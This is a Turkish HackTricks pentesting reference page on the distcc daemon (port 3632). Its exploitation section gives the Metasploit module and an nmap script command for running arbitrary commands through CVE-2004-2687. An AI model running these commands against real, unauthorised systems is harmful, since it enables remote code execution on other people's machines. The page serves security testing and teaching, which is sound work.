hacktricks/network-services-pentesting/3632-pentesting-distcc.md

AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'ı desteklemenin diğer yolları:

• Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
• Resmi PEASS & HackTricks ürünlerini edinin
• PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
• Katılın 💬 Discord grubuna veya telegram grubuna veya bizi Twitter 🐦 @carlospolopm** takip edin.**
• Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.

Temel Bilgiler

Distcc, ağdaki diğer bilgisayarların boş işlem gücünü kullanarak derleme sürecini geliştiren bir araçtır. Bir makinede distcc kurulduğunda, bu makine derleme görevlerini başka bir sisteme dağıtabilir hale gelir. Alıcı sistem, gönderilen kodu işlemek için uyumlu bir derleyiciye sahip olmalı ve distccd daemon'ı çalıştırmalıdır.

Varsayılan port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Sömürü

CVE-2004-2687'ye karşı savunmasız olup olmadığını kontrol edin ve keyfi kod yürütmeyi deneyin:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Bu servisi Shodan'ın tespit etmediğini düşünmüyorum.

Kaynaklar

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Oluşturan: Álex B (@r1p)